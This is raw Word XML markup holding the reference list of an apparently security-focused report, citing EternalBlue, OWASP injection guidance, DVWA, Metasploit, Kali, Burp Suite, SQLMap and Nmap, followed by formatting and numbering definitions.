    <w:p w14:paraId="4676CDC2" w14:textId="6D7909D2" w:rsidR="00653DEA" w:rsidRDefault="00653DEA" w:rsidP="00DB02B5">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">[17] </w:t>
      </w:r>
      <w:r w:rsidR="00A50DBC" w:rsidRPr="00A50DBC">
        <w:rPr>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">National Institute of Standards and Technology (NIST), "CVE-2017-0144 Detail," National Vulnerability Database, Mar. 2017. https://nvd.nist.gov/vuln/detail/cve-2017-0144. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22B73750" w14:textId="77777777" w:rsidR="00140522" w:rsidRDefault="00140522" w:rsidP="00DB02B5">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4667D7C5" w14:textId="77777777" w:rsidR="0083505B" w:rsidRDefault="00140522" w:rsidP="00DB02B5">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">[18] </w:t>
      </w:r>
      <w:r w:rsidR="00593745" w:rsidRPr="00593745">
        <w:rPr>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">Microsoft </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00593745" w:rsidRPr="00593745">
        <w:rPr>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>EternalBlue</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00593745" w:rsidRPr="00593745">
        <w:rPr>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> SMB remote code execution (MS17-010)," Metasploit Module Database, 2017.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CF65010" w14:textId="29E4C80F" w:rsidR="00140522" w:rsidRDefault="00593745" w:rsidP="00DB02B5">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00593745">
        <w:rPr>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">https://www.rapid7.com/db/modules/exploit/windows/smb/ms17_010_eternalblue/. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6802035D" w14:textId="77777777" w:rsidR="00593745" w:rsidRDefault="00593745" w:rsidP="00DB02B5">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="53866902" w14:textId="4A3BDC8F" w:rsidR="00593745" w:rsidRDefault="00593745" w:rsidP="00DB02B5">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">[19] </w:t>
      </w:r>
      <w:r w:rsidR="00051E18" w:rsidRPr="00051E18">
        <w:rPr>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">Open Web Application Security Project (OWASP), "OWASP Top Ten — A03:2021 Injection," OWASP Foundation, 2021.  https://owasp.org/Top10/A03_2021-Injection/. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F1DC938" w14:textId="77777777" w:rsidR="00051E18" w:rsidRDefault="00051E18" w:rsidP="00DB02B5">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="19600F6D" w14:textId="6F1C6815" w:rsidR="00051E18" w:rsidRDefault="00051E18" w:rsidP="00DB02B5">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">[20] </w:t>
      </w:r>
      <w:r w:rsidRPr="00051E18">
        <w:rPr>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">OWASP Foundation, "SQL Injection Prevention Cheat Sheet," OWASP Cheat Sheet Series, 2024.  https://cheatsheetseries.owasp.org/cheatsheets/SQL_Injection_Prevention_Cheat_Sheet.html. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7603CE6A" w14:textId="77777777" w:rsidR="00051E18" w:rsidRDefault="00051E18" w:rsidP="00DB02B5">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6562312C" w14:textId="5FF4547B" w:rsidR="00051E18" w:rsidRDefault="00051E18" w:rsidP="00DB02B5">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">[21] </w:t>
      </w:r>
      <w:r w:rsidR="00BB60F7">
        <w:rPr>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00BB60F7" w:rsidRPr="00BB60F7">
        <w:rPr>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">OWASP Foundation, "Damn Vulnerable Web Application (DVWA)," OWASP BWA Project, GitHub, 2023.  https://github.com/digininja/DVWA. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65E80E2E" w14:textId="77777777" w:rsidR="00BB60F7" w:rsidRDefault="00BB60F7" w:rsidP="00DB02B5">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2BFBBDFE" w14:textId="06503486" w:rsidR="00BB60F7" w:rsidRDefault="00C47FAE" w:rsidP="00DB02B5">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">[22] </w:t>
      </w:r>
      <w:r w:rsidRPr="00C47FAE">
        <w:rPr>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">Metasploit Framework overview," Rapid7 Documentation, 2024.  https://docs.rapid7.com/metasploit/msf-overview/. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="193CD56C" w14:textId="77777777" w:rsidR="00C47FAE" w:rsidRDefault="00C47FAE" w:rsidP="00DB02B5">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="62255B13" w14:textId="69490E67" w:rsidR="00C47FAE" w:rsidRDefault="00C47FAE" w:rsidP="00DB02B5">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">[23] </w:t>
      </w:r>
      <w:r w:rsidRPr="00C47FAE">
        <w:rPr>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">Metasploit Framework 6.3 released," Rapid7 Blog, Jan. 2023.  https://www.rapid7.com/blog/post/2023/01/30/metasploit-framework-6-3-released/. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ED89ED9" w14:textId="77777777" w:rsidR="00C356F2" w:rsidRDefault="00C356F2" w:rsidP="00DB02B5">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="59FCF26F" w14:textId="79448A22" w:rsidR="00C356F2" w:rsidRDefault="00C356F2" w:rsidP="00DB02B5">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">[24] </w:t>
      </w:r>
      <w:r w:rsidRPr="00C356F2">
        <w:rPr>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">Offensive Security, "Kali Linux — The most advanced penetration testing distribution," Offensive Security, 2024.  https://www.kali.org/. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28A65DAC" w14:textId="77777777" w:rsidR="00C356F2" w:rsidRDefault="00C356F2" w:rsidP="00DB02B5">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="52F184DB" w14:textId="12064F90" w:rsidR="00C356F2" w:rsidRDefault="00C356F2" w:rsidP="00DB02B5">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">[25] </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00D46B53" w:rsidRPr="00D46B53">
        <w:rPr>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>PortSwigger</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00D46B53" w:rsidRPr="00D46B53">
        <w:rPr>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">, "Burp Suite Community Edition — web application security testing," </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00D46B53" w:rsidRPr="00D46B53">
        <w:rPr>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>PortSwigger</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00D46B53" w:rsidRPr="00D46B53">
        <w:rPr>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>, 2024.  https://portswigger.net/burp/communitydownload.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DE2621C" w14:textId="77777777" w:rsidR="00D46B53" w:rsidRDefault="00D46B53" w:rsidP="00DB02B5">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="60EB7E11" w14:textId="6800AFAC" w:rsidR="00D46B53" w:rsidRDefault="00D46B53" w:rsidP="00DB02B5">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">[26] </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00396F6F" w:rsidRPr="00396F6F">
        <w:rPr>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>SQLMap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00396F6F" w:rsidRPr="00396F6F">
        <w:rPr>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> Project, "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00396F6F" w:rsidRPr="00396F6F">
        <w:rPr>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>SQLMap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00396F6F" w:rsidRPr="00396F6F">
        <w:rPr>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">: Automatic SQL injection and database takeover tool," SQLMap.org, 2024.  https://sqlmap.org/. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E438A7D" w14:textId="77777777" w:rsidR="004A256B" w:rsidRDefault="004A256B" w:rsidP="00DB02B5">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7FB014B7" w14:textId="2550C4AC" w:rsidR="004A256B" w:rsidRDefault="004A256B" w:rsidP="00DB02B5">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">[27] </w:t>
      </w:r>
      <w:r w:rsidR="009D3A5A" w:rsidRPr="009D3A5A">
        <w:rPr>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">Nmap Project, "Nmap: Network mapper — free security scanner," Nmap.org, 2024.  https://nmap.org/. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27E99BA0" w14:textId="77777777" w:rsidR="00F21AB7" w:rsidRDefault="00F21AB7" w:rsidP="00DB02B5">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="618D689A" w14:textId="66F59E51" w:rsidR="00F21AB7" w:rsidRPr="005F1487" w:rsidRDefault="00F21AB7" w:rsidP="00DB02B5">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>[2</w:t>
      </w:r>
      <w:r w:rsidR="00335EC1">
        <w:rPr>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">8] </w:t>
      </w:r>
      <w:r w:rsidR="001B3C39" w:rsidRPr="001B3C39">
        <w:rPr>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">OWASP Foundation, "OWASP Broken Web Applications (BWA) project," OWASP, 2014, accessed 2025.  https://owasp.org/www-project-broken-web-applications/. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78596B97" w14:textId="77777777" w:rsidR="005F1487" w:rsidRDefault="005F1487" w:rsidP="003A4B7A">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="195932C5" w14:textId="20239030" w:rsidR="00EB3ED5" w:rsidRPr="006F18DC" w:rsidRDefault="00EB3ED5" w:rsidP="00396F6F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="00EB3ED5" w:rsidRPr="006F18DC">
      <w:headerReference w:type="even" r:id="rId66"/>
      <w:headerReference w:type="default" r:id="rId67"/>
      <w:footerReference w:type="even" r:id="rId68"/>
      <w:footerReference w:type="default" r:id="rId69"/>
      <w:headerReference w:type="first" r:id="rId70"/>
      <w:footerReference w:type="firs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C678E" w14:textId="77777777" w:rsidR="00B57625" w:rsidRDefault="00B57625" w:rsidP="008A15C3">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="3F64551E" w14:textId="77777777" w:rsidR="00B57625" w:rsidRDefault="00B57625" w:rsidP="008A1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8726C1" w14:textId="77777777" w:rsidR="00BA0A83" w:rsidRDefault="00BA0A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9259567"/>
      <w:docPartObj>
        <w:docPartGallery w:val="Page Numbers (Bottom of Page)"/>
        <w:docPartUnique/>
      </w:docPartObj>
    </w:sdtPr>
    <w:sdtEndPr>
      <w:rPr>
        <w:color w:val="7F7F7F" w:themeColor="background1" w:themeShade="7F"/>
        <w:spacing w:val="60"/>
      </w:rPr>
    </w:sdtEndPr>
    <w:sdtContent>
      <w:p w14:paraId="45B9F16F" w14:textId="29FFA339" w:rsidR="008A15C3" w:rsidRDefault="008A15C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C778A37" w14:textId="77777777" w:rsidR="008A15C3" w:rsidRDefault="008A15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61CEF" w14:textId="77777777" w:rsidR="00BA0A83" w:rsidRDefault="00BA0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43854" w14:textId="77777777" w:rsidR="00B57625" w:rsidRDefault="00B57625" w:rsidP="008A15C3">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="7F79AAB2" w14:textId="77777777" w:rsidR="00B57625" w:rsidRDefault="00B57625" w:rsidP="008A15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34FD0" w14:textId="77777777" w:rsidR="00BA0A83" w:rsidRDefault="00BA0A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8955731"/>
      <w:docPartObj>
        <w:docPartGallery w:val="Page Numbers (Top of Page)"/>
        <w:docPartUnique/>
      </w:docPartObj>
    </w:sdtPr>
    <w:sdtEndPr>
      <w:rPr>
        <w:color w:val="7F7F7F" w:themeColor="background1" w:themeShade="7F"/>
        <w:spacing w:val="60"/>
      </w:rPr>
    </w:sdtEndPr>
    <w:sdtContent>
      <w:p w14:paraId="1A40D8B0" w14:textId="1C85B212" w:rsidR="00BA0A83" w:rsidRDefault="00BA0A8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3BC31EB" w14:textId="77777777" w:rsidR="00BA0A83" w:rsidRDefault="00BA0A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4D8C36" w14:textId="77777777" w:rsidR="00BA0A83" w:rsidRDefault="00BA0A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168CE"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="0742F2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97E5E"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="87822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142CDE"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="0EBC8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D95E56"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="432096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582CD6"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="AE601B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D0217C"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="78060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FB754E"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="227A1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3993"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="AAD6735A"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="360" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%2"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="360" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>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DAD620A"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="DA800D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A55DE7"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="78002E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B165DF"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="BC383E70"/>
    <w:lvl w:ilvl="0" w:tplc="0809000B">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="760" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings"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1" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="6E6F54C8"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="7D2A2F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9C1900"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="82D8F70E"/>
    <w:lvl w:ilvl="0" w:tplc="A0F2F47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1743610">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="395712842">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="1495411684">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="570968406">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="292058609">
    <w:abstractNumId w:val="10"/>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="242448167">
    <w:abstractNumId w:val="9"/>
  </w:num>
  <w:num w:numId="7" w16cid:durableId="546531341">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="8" w16cid:durableId="1488861956">
    <w:abstractNumId w:val="12"/>
  </w:num>
  <w:num w:numId="9" w16cid:durableId="1843230674">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="10" w16cid:durableId="268313966">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="11" w16cid:durableId="1608728386">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="12" w16cid:durableId="1672954116">
    <w:abstractNumId w:val="11"/>
  </w:num>
  <w:num w:numId="13" w16cid:durableId="5332256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970D4"/>
    <w:rsid w:val="00035B94"/>
    <w:rsid w:val="00047BEC"/>
    <w:rsid w:val="00051E18"/>
    <w:rsid w:val="00054559"/>
    <w:rsid w:val="000765F3"/>
    <w:rsid w:val="000A25B0"/>
    <w:rsid w:val="000A2DAB"/>
    <w:rsid w:val="000B6436"/>
    <w:rsid w:val="000B675F"/>
    <w:rsid w:val="000C59B8"/>
    <w:rsid w:val="000D3669"/>
    <w:rsid w:val="000D6F4D"/>
    <w:rsid w:val="000E0647"/>
    <w:rsid w:val="00111765"/>
    <w:rsid w:val="001237AD"/>
    <w:rsid w:val="00140522"/>
    <w:rsid w:val="00145115"/>
    <w:rsid w:val="00147670"/>
    <w:rsid w:val="001612CF"/>
    <w:rsid w:val="00163004"/>
    <w:rsid w:val="001B3C39"/>
    <w:rsid w:val="001C2F41"/>
    <w:rsid w:val="001C5966"/>
    <w:rsid w:val="001F79AF"/>
    <w:rsid w:val="002105FF"/>
    <w:rsid w:val="00220438"/>
    <w:rsid w:val="0022784D"/>
    <w:rsid w:val="00257FED"/>
    <w:rsid w:val="00266334"/>
    <w:rsid w:val="00276DCA"/>
    <w:rsid w:val="00282E23"/>
    <w:rsid w:val="002832D2"/>
    <w:rsid w:val="002A2E88"/>
    <w:rsid w:val="002A353F"/>
    <w:rsid w:val="002B75DF"/>
    <w:rsid w:val="002C1A3E"/>
    <w:rsid w:val="002C7A51"/>
    <w:rsid w:val="002E2555"/>
    <w:rsid w:val="0030609C"/>
    <w:rsid w:val="0031591D"/>
    <w:rsid w:val="003225CE"/>
    <w:rsid w:val="00335EC1"/>
    <w:rsid w:val="00380C80"/>
    <w:rsid w:val="0038275F"/>
    <w:rsid w:val="0038444C"/>
    <w:rsid w:val="00391692"/>
    <w:rsid w:val="00396F6F"/>
    <w:rsid w:val="003A1B4C"/>
    <w:rsid w:val="003A4B7A"/>
    <w:rsid w:val="003A664E"/>
    <w:rsid w:val="003F20D2"/>
    <w:rsid w:val="00405BD3"/>
    <w:rsid w:val="004115EF"/>
    <w:rsid w:val="004143EA"/>
    <w:rsid w:val="00433834"/>
    <w:rsid w:val="004448D7"/>
    <w:rsid w:val="004558A6"/>
    <w:rsid w:val="00492D5F"/>
    <w:rsid w:val="004970D4"/>
    <w:rsid w:val="004A256B"/>
    <w:rsid w:val="004B2D86"/>
    <w:rsid w:val="004B7197"/>
    <w:rsid w:val="004C0467"/>
    <w:rsid w:val="004C3018"/>
    <w:rsid w:val="004D2D49"/>
    <w:rsid w:val="004F0419"/>
    <w:rsid w:val="0051481A"/>
    <w:rsid w:val="00543DF7"/>
    <w:rsid w:val="00546009"/>
    <w:rsid w:val="00554662"/>
    <w:rsid w:val="00563883"/>
    <w:rsid w:val="00567064"/>
    <w:rsid w:val="00575F7C"/>
    <w:rsid w:val="00577E70"/>
    <w:rsid w:val="00581970"/>
    <w:rsid w:val="00590408"/>
    <w:rsid w:val="005931E7"/>
    <w:rsid w:val="00593745"/>
    <w:rsid w:val="00595FDC"/>
    <w:rsid w:val="005A17FB"/>
    <w:rsid w:val="005D5B20"/>
    <w:rsid w:val="005D68D8"/>
    <w:rsid w:val="005D6CFF"/>
    <w:rsid w:val="005F1487"/>
    <w:rsid w:val="005F47A8"/>
    <w:rsid w:val="0061565C"/>
    <w:rsid w:val="0064014B"/>
    <w:rsid w:val="00651D6C"/>
    <w:rsid w:val="00653DEA"/>
    <w:rsid w:val="0068337C"/>
    <w:rsid w:val="006B594A"/>
    <w:rsid w:val="006F18DC"/>
    <w:rsid w:val="006F1DE6"/>
    <w:rsid w:val="0073300A"/>
    <w:rsid w:val="00745F46"/>
    <w:rsid w:val="00774A59"/>
    <w:rsid w:val="00797850"/>
    <w:rsid w:val="007D29E2"/>
    <w:rsid w:val="007E2733"/>
    <w:rsid w:val="007F5B69"/>
    <w:rsid w:val="007F75BA"/>
    <w:rsid w:val="008028AE"/>
    <w:rsid w:val="008051C1"/>
    <w:rsid w:val="0083505B"/>
    <w:rsid w:val="0086318C"/>
    <w:rsid w:val="0089452E"/>
    <w:rsid w:val="008A15C3"/>
    <w:rsid w:val="008C212B"/>
    <w:rsid w:val="008E34EC"/>
    <w:rsid w:val="008F1945"/>
    <w:rsid w:val="00912A8C"/>
    <w:rsid w:val="00914E15"/>
    <w:rsid w:val="00945CEA"/>
    <w:rsid w:val="00980408"/>
    <w:rsid w:val="00986FD6"/>
    <w:rsid w:val="009978F7"/>
    <w:rsid w:val="009C7E49"/>
    <w:rsid w:val="009D38BD"/>
    <w:rsid w:val="009D3A5A"/>
    <w:rsid w:val="009D52D3"/>
    <w:rsid w:val="00A06839"/>
    <w:rsid w:val="00A4666C"/>
    <w:rsid w:val="00A50DBC"/>
    <w:rsid w:val="00A605C6"/>
    <w:rsid w:val="00A607C3"/>
    <w:rsid w:val="00A6690F"/>
    <w:rsid w:val="00A97F6C"/>
    <w:rsid w:val="00AA13E3"/>
    <w:rsid w:val="00AB480E"/>
    <w:rsid w:val="00AD5BCE"/>
    <w:rsid w:val="00B209D7"/>
    <w:rsid w:val="00B2521F"/>
    <w:rsid w:val="00B25530"/>
    <w:rsid w:val="00B27DCD"/>
    <w:rsid w:val="00B34226"/>
    <w:rsid w:val="00B37E8C"/>
    <w:rsid w:val="00B42F44"/>
    <w:rsid w:val="00B43DD5"/>
    <w:rsid w:val="00B50011"/>
    <w:rsid w:val="00B57625"/>
    <w:rsid w:val="00B602BB"/>
    <w:rsid w:val="00B64D47"/>
    <w:rsid w:val="00B67A91"/>
    <w:rsid w:val="00B77601"/>
    <w:rsid w:val="00BA0A83"/>
    <w:rsid w:val="00BA787D"/>
    <w:rsid w:val="00BB60F7"/>
    <w:rsid w:val="00BB7E15"/>
    <w:rsid w:val="00BD3C32"/>
    <w:rsid w:val="00BF2D7D"/>
    <w:rsid w:val="00C074E6"/>
    <w:rsid w:val="00C13F59"/>
    <w:rsid w:val="00C16733"/>
    <w:rsid w:val="00C17ABC"/>
    <w:rsid w:val="00C356F2"/>
    <w:rsid w:val="00C47FAE"/>
    <w:rsid w:val="00C66FA7"/>
    <w:rsid w:val="00C71290"/>
    <w:rsid w:val="00C84191"/>
    <w:rsid w:val="00C934DB"/>
    <w:rsid w:val="00C9769F"/>
    <w:rsid w:val="00CB5E1A"/>
    <w:rsid w:val="00CF4CA5"/>
    <w:rsid w:val="00D27B9A"/>
    <w:rsid w:val="00D31F6D"/>
    <w:rsid w:val="00D46B53"/>
    <w:rsid w:val="00D774EF"/>
    <w:rsid w:val="00D85E16"/>
    <w:rsid w:val="00D95E6F"/>
    <w:rsid w:val="00DB02B5"/>
    <w:rsid w:val="00DC5A96"/>
    <w:rsid w:val="00DD678C"/>
    <w:rsid w:val="00DE0ACA"/>
    <w:rsid w:val="00E07BB3"/>
